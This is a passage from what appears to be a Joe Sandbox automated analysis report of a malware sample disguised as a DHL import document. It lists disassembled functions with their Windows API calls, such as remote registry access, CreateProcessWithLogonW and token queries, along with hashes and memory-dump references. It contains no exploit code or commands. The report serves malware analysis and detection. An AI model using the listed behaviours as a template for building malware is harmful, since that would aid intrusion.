                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1414292761-0
                                                                                          • Opcode ID: 32ba57176e4c3f681bc1456b994d918de332965fc12ee4ad0b3312f0dfddf4a6
                                                                                          • Instruction ID: 92be9e69ae4976502bff7e389ee3251380130b3f3b9ea80b9980087ac0c2c31a
                                                                                          • Opcode Fuzzy Hash: 32ba57176e4c3f681bc1456b994d918de332965fc12ee4ad0b3312f0dfddf4a6
                                                                                          • Instruction Fuzzy Hash: B351BE72A00216ABEB658F64CC81EAF77A9FF45754F164629F805DA2C0EB34DC70C6A1
                                                                                          Function 0085BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085BCCA
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085BD25
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0085BD6A
                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0085BD99
                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0085BDF3
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085BDFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                          • String ID:
                                                                                          • API String ID: 1120388591-0
                                                                                          • Opcode ID: 3df7010c0eb003d183033ec67d4323dd495ec1e3f8b7a8bd52ef0bdc1834917f
                                                                                          • Instruction ID: 3b6607683a3f4165a144611f118caeb40531c818bc8d1923a0a1aab9aea000f0
                                                                                          • Opcode Fuzzy Hash: 3df7010c0eb003d183033ec67d4323dd495ec1e3f8b7a8bd52ef0bdc1834917f
                                                                                          • Instruction Fuzzy Hash: 4F813731208241EFD714DF24C895E2ABBE5FF84308F14855DF9998B2A2DB35ED49CB92
                                                                                          Function 0082F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(00000035), ref: 0082F7B9
                                                                                          • SysAllocString.OLEAUT32(00000001), ref: 0082F860
                                                                                          • VariantCopy.OLEAUT32(0082FA64,00000000), ref: 0082F889
                                                                                          • VariantClear.OLEAUT32(0082FA64), ref: 0082F8AD
                                                                                          • VariantCopy.OLEAUT32(0082FA64,00000000), ref: 0082F8B1
                                                                                          • VariantClear.OLEAUT32(?), ref: 0082F8BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                          • String ID:
                                                                                          • API String ID: 3859894641-0
                                                                                          • Opcode ID: 8d6656878096a5bd262b9ecfd3f19baae89dbccaffadc43854327bc8f39c0cef
                                                                                          • Instruction ID: 0ccc168390f1fc41c67341390627517478dbb6801ad57e8e689dca455443b97c
                                                                                          • Opcode Fuzzy Hash: 8d6656878096a5bd262b9ecfd3f19baae89dbccaffadc43854327bc8f39c0cef
                                                                                          • Instruction Fuzzy Hash: 2551B331600324EACF24AB65E895B29B7B4FF45314B249477EA06DF293DB748CC0C796
                                                                                          Function 0084910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 008494E5
                                                                                          • _wcslen.LIBCMT ref: 00849506
                                                                                          • _wcslen.LIBCMT ref: 0084952D
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00849585
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                          • String ID: X
                                                                                          • API String ID: 83654149-3081909835
                                                                                          • Opcode ID: c81fb665daab1b40c7d903e108b302fca4442def225af8fbd5d515768d5ad9a9
                                                                                          • Instruction ID: 2eaa5ef3cfdf1ac415c8de29cab1cf5acae2deb7803fa82e606b8f50f602400f
                                                                                          • Opcode Fuzzy Hash: c81fb665daab1b40c7d903e108b302fca4442def225af8fbd5d515768d5ad9a9
                                                                                          • Instruction Fuzzy Hash: 51E19E31604304DFC724DF24C885A6AB7E0FF85314F15896DE9999B3A2EB35ED05CB92
                                                                                          Function 007E920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • BeginPaint.USER32(?,?,?), ref: 007E9241
                                                                                          • GetWindowRect.USER32(?,?), ref: 007E92A5
                                                                                          • ScreenToClient.USER32(?,?), ref: 007E92C2
                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007E92D3
                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 007E9321
                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008271EA
                                                                                            • Part of subcall function 007E9339: BeginPath.GDI32(00000000), ref: 007E9357
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                          • String ID:
                                                                                          • API String ID: 3050599898-0
                                                                                          • Opcode ID: 87abe63f4f5480d8f14eecedcac7a3d20e4d0539fce1cbb5ced7da40dc2bf059
                                                                                          • Instruction ID: f496609490f45d9eb5cfae87e6e53328883241418a4d25d64d4305ee33ff4861
                                                                                          • Opcode Fuzzy Hash: 87abe63f4f5480d8f14eecedcac7a3d20e4d0539fce1cbb5ced7da40dc2bf059
                                                                                          • Instruction Fuzzy Hash: 6341A071105250AFDB11DF26D888FBB7BA8FF5A320F140229FAA4C71A1C7759845DB62
                                                                                          Function 008407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0084080C
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00840847
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00840863
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 008408DC
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008408F3
                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00840921
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3368777196-0
                                                                                          • Opcode ID: b25fa7c25879a3cb78c447c4644333ba0fa51f34169cbc4557ac7d7d87c4d44b
                                                                                          • Instruction ID: 937d67721e2bc28f733b7a1893f3c61b8d121a4770724a100b4a41486213b08e
                                                                                          • Opcode Fuzzy Hash: b25fa7c25879a3cb78c447c4644333ba0fa51f34169cbc4557ac7d7d87c4d44b
                                                                                          • Instruction Fuzzy Hash: 88416B71900209EBDF14AF54DC85A6A7B78FF08300F1440A9EE00DA297DB74EE60DFA0
                                                                                          Function 008681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0082F3AB,00000000,?,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0086824C
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00868272
                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008682D1
                                                                                          • ShowWindow.USER32(00000000,00000004), ref: 008682E5
                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 0086830B
                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0086832F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 642888154-0
                                                                                          • Opcode ID: 5cc2ff6f1706b3c0cdf6d58c703b6b6e7c3e9ba955614e879acf284e0270c153
                                                                                          • Instruction ID: 15555c4e99de4006c9cb0bb30db23b547d3ddf712d5877362e699447f9fc4127
                                                                                          • Opcode Fuzzy Hash: 5cc2ff6f1706b3c0cdf6d58c703b6b6e7c3e9ba955614e879acf284e0270c153
                                                                                          • Instruction Fuzzy Hash: 71418334601644EFDF21CF25C9A9BA57BE1FB0A714F1A5269E64C8B362CB71A841CB50
                                                                                          Function 00834C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 00834C95
                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00834CB2
                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00834CEA
                                                                                          • _wcslen.LIBCMT ref: 00834D08
                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00834D10
                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00834D1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                          • String ID:
                                                                                          • API String ID: 72514467-0
                                                                                          • Opcode ID: 86c3543f0851a8c9114c803bb66c743facd56577f6487b140345d5dd438d6ee9
                                                                                          • Instruction ID: 53eeae351c9b8f96ffd22143dcaf7d0818ebebe30baa3cd930492988a3b52d98
                                                                                          • Opcode Fuzzy Hash: 86c3543f0851a8c9114c803bb66c743facd56577f6487b140345d5dd438d6ee9
                                                                                          • Instruction Fuzzy Hash: F1213B31205244BBEB155B35EC09E7B7B9CEF89750F10903DF805CA192EEB5EC0186E0
                                                                                          Function 0084581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                          • _wcslen.LIBCMT ref: 0084587B
                                                                                          • CoInitialize.OLE32(00000000), ref: 00845995
                                                                                          • CoCreateInstance.OLE32(0086FCF8,00000000,00000001,0086FB68,?), ref: 008459AE
                                                                                          • CoUninitialize.OLE32 ref: 008459CC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 3172280962-24824748
                                                                                          • Opcode ID: e47b758c03f988a8915f21ce3e3b3668af0839ca72c59c9ff895087f822f19f4
                                                                                          • Instruction ID: 993ee63a0d37814e2b24fa831c320c6a9768a624480fa157b41b43d6bf36c42d
                                                                                          • Opcode Fuzzy Hash: e47b758c03f988a8915f21ce3e3b3668af0839ca72c59c9ff895087f822f19f4
                                                                                          • Instruction Fuzzy Hash: BBD14171608609DFC714DF24C48492EBBE1FF89724F14895AF88A9B362DB31EC05CB92
                                                                                          Function 0083175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00830FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00830FCA
                                                                                            • Part of subcall function 00830FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00830FD6
                                                                                            • Part of subcall function 00830FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00830FE5
                                                                                            • Part of subcall function 00830FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00830FEC
                                                                                            • Part of subcall function 00830FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00831002
                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00831335), ref: 008317AE
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008317BA
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 008317C1
                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 008317DA
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00831335), ref: 008317EE
                                                                                          • HeapFree.KERNEL32(00000000), ref: 008317F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                          • String ID:
                                                                                          • API String ID: 3008561057-0
                                                                                          • Opcode ID: 3c07dfa1ee25bf882803c02e6b17169f59c8f5888fd5ce6043eb3d3c18b629b5
                                                                                          • Instruction ID: 85244599a7920b2770d4f397b113a604a1522899dbd0444918461bda0efe8b4b
                                                                                          • Opcode Fuzzy Hash: 3c07dfa1ee25bf882803c02e6b17169f59c8f5888fd5ce6043eb3d3c18b629b5
                                                                                          • Instruction Fuzzy Hash: 2711A932600605EFDF209FA4CC49BBE7BA9FB82759F184018F481E7214C776A944CBA0
                                                                                          Function 008314CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008314FF
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00831506
                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00831515
                                                                                          • CloseHandle.KERNEL32(00000004), ref: 00831520
                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083154F
                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00831563
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                          • String ID:
                                                                                          • API String ID: 1413079979-0
                                                                                          • Opcode ID: d7bd54e830a5804fec4fd70395d1fe0fbaf78140f23eeb3e12270bc008450929
                                                                                          • Instruction ID: fb42983f28fea5760b6a1e812bbe37ecc69cd57d5a7874a827799b4545147533
                                                                                          • Opcode Fuzzy Hash: d7bd54e830a5804fec4fd70395d1fe0fbaf78140f23eeb3e12270bc008450929
                                                                                          • Instruction Fuzzy Hash: EE11597250020DABDF118F98DD49FEE7BA9FF88B44F054015FA05E2160C3B58E60DBA0
                                                                                          Function 007F3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,007F3379,007F2FE5), ref: 007F3390
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007F339E
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F33B7
                                                                                          • SetLastError.KERNEL32(00000000,?,007F3379,007F2FE5), ref: 007F3409
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 9089cb073527b00bf49dec60bd630e275d7ff1b0aac695fa86df641c7e157bdd
                                                                                          • Instruction ID: 2733c64a2ab8ef3faaa7d115941d00fb5f20b4c57a8063af797444aa450afb6e
                                                                                          • Opcode Fuzzy Hash: 9089cb073527b00bf49dec60bd630e275d7ff1b0aac695fa86df641c7e157bdd
                                                                                          • Instruction Fuzzy Hash: 7101DF33609719BEAA2537B8BC89A772A94FB05379B20022AF710C53F0EF5A4E115554
                                                                                          Function 00802D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00805686,00813CD6,?,00000000,?,00805B6A,?,?,?,?,?,007FE6D1,?,00898A48), ref: 00802D78
                                                                                          • _free.LIBCMT ref: 00802DAB
                                                                                          • _free.LIBCMT ref: 00802DD3
                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,007FE6D1,?,00898A48,00000010,007D4F4A,?,?,00000000,00813CD6), ref: 00802DE0
                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,007FE6D1,?,00898A48,00000010,007D4F4A,?,?,00000000,00813CD6), ref: 00802DEC
                                                                                          • _abort.LIBCMT ref: 00802DF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 58b3ef94ae2dca4cded0a0d842168afc8ca89c9da583030bae4ea8ee2e6c98fc
                                                                                          • Instruction ID: 37858004c1a21d95f50b84624bd964be2c58f25a0f9361e9290400223d51790b
                                                                                          • Opcode Fuzzy Hash: 58b3ef94ae2dca4cded0a0d842168afc8ca89c9da583030bae4ea8ee2e6c98fc
                                                                                          • Instruction Fuzzy Hash: 77F0C83664560467D6D2373CBC0EE2A2A5DFFC27A5F354519FD24D22E2EFE58C014162
                                                                                          Function 00868A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
                                                                                            • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96A2
                                                                                            • Part of subcall function 007E9639: BeginPath.GDI32(?), ref: 007E96B9
                                                                                            • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96E2
                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00868A4E
                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00868A62
                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00868A70
                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00868A80
                                                                                          • EndPath.GDI32(?), ref: 00868A90
                                                                                          • StrokePath.GDI32(?), ref: 00868AA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
